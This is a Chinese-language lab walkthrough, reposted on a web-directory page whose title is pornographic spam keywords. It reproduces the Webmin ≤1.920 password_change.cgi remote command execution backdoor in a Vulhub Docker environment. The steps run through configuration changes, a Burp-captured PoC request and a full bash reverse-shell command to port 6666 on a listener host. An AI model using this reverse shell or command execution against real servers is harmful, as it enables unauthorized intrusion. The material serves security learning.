日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

漏洞描述

近日webmin被發(fā)現(xiàn)存在一處遠(yuǎn)程命令執(zhí)行漏洞,經(jīng)過(guò)分析后,初步猜測(cè)其為一次后門植入事件,webmin是目前功能最強(qiáng)大的基于web的unix系統(tǒng)管理工具,管理員通過(guò)瀏覽器訪問(wèn)webmin的各種管理功能并完成相應(yīng)的管理動(dòng)作,當(dāng)用戶開啟webmin密碼重置功能后,攻擊者可以通過(guò)發(fā)送post請(qǐng)求在目標(biāo)系統(tǒng)中執(zhí)行任意命令,且無(wú)需身份驗(yàn)證。

影響范圍:webmin <=1.920

 

漏洞復(fù)現(xiàn)

進(jìn)入到vuhub之后,就直接執(zhí)行Docker-compose up -d拉取鏡像搭建

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

搭建好之后,直接訪問(wèn)192.168.1.1:10000 但是vuhub搭建的網(wǎng)站它是有問(wèn)題的,所以要根據(jù)它報(bào)錯(cuò)的提示去修改相當(dāng), 所以這里的話,就需要用https去訪問(wèn),不然會(huì)不給訪問(wèn):https://192.168.1.1:10000/

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

接著就是我們的漏洞利用,訪問(wèn)https://192.168.67.135:10000/password_change.cgi,這樣的話,去訪問(wèn)它是會(huì)報(bào)錯(cuò)的,所以這里我們需要去修改一下配置文件。

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

接著就是進(jìn)入后臺(tái)修改配置文件,這里的話,就直接用docker exec it id號(hào) /bin/bash

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

進(jìn)入到/etc/webmin目錄下,查看config文件。我們要修改的內(nèi)容是config中的referers_one=1這個(gè)配置。

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

但是在docker容器中,它是沒有編輯器的,所以這里的話,我們需要安裝一個(gè)vim編輯器

cat /etc/os-release先進(jìn)入容器查看發(fā)行版,確定使用yum還是apt安裝工具

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

可以看到使用的debian8的操作系統(tǒng),接下來(lái)apt安裝, apt install vim

接著就是編輯這個(gè)文件config,然后將referers_one=1改為referers_one=0

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

接著再去訪問(wèn)那個(gè)路徑就可以看見,我們這邊的頁(yè)面也發(fā)生了相對(duì)應(yīng)的變換,它已經(jīng)不報(bào)錯(cuò)了。

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

那么接下來(lái)的話,就是利用poc復(fù)現(xiàn)漏洞,這里的話,要訪問(wèn)https://192.168.1.1:10000/password_change.cgi并且用burp抓包

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

使用網(wǎng)上的poc懟,看到成功執(zhí)行命令
poc如下

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

之后看見效果,很明顯的成功執(zhí)行了命令。

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

執(zhí)行一個(gè)whoami,它這里也成功的輸出相對(duì)應(yīng)的權(quán)限

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

那么我們就要反彈shell,由于它這里可以執(zhí)行執(zhí)行命令,那么我們就可以直接執(zhí)行bash -c "bash -i >& /dev/tcp/192.168.1.1/6666 0>&1" 接收shell服務(wù)器的6666端口)

那么的話,執(zhí)行這個(gè)命令,那么我們服務(wù)器那邊就要監(jiān)聽6666,接收反彈回來(lái)的shell。 這里的話,需要將payload進(jìn)一方面的url編碼再去執(zhí)行

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

服務(wù)器那邊監(jiān)聽6666端口接收反彈回來(lái)的shell可以看見我們執(zhí)行的payload,右邊的頁(yè)面一片空白,就說(shuō)明成功了。

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

然后就可以看見成功的反彈了一個(gè)shell過(guò)來(lái)了。

漏洞利用復(fù)現(xiàn),看看黑客如何入侵服務(wù)器

 

最后喜歡我文章的朋友請(qǐng)加圈子關(guān)注我們,私信關(guān)鍵詞:學(xué)習(xí)。(送免費(fèi)資料和優(yōu)惠券)

就會(huì)自動(dòng)分享給你微信號(hào)。歡迎大家加入我們的安全大家庭。提高大家的安全意識(shí),提升大家的網(wǎng)絡(luò)安全技能一直是我們的初衷和愿景,讓我們共同成為守護(hù)信息世界的"SaFeMAN"。

還有可以關(guān)注我們微信公眾號(hào),在公眾號(hào)上輸入安界網(wǎng),就可以關(guān)注到我們,領(lǐng)取資料和優(yōu)惠券!

分享到:
標(biāo)簽:漏洞 服務(wù)器
用戶無(wú)頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過(guò)答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫(kù),初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績(jī)?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績(jī)?cè)u(píng)定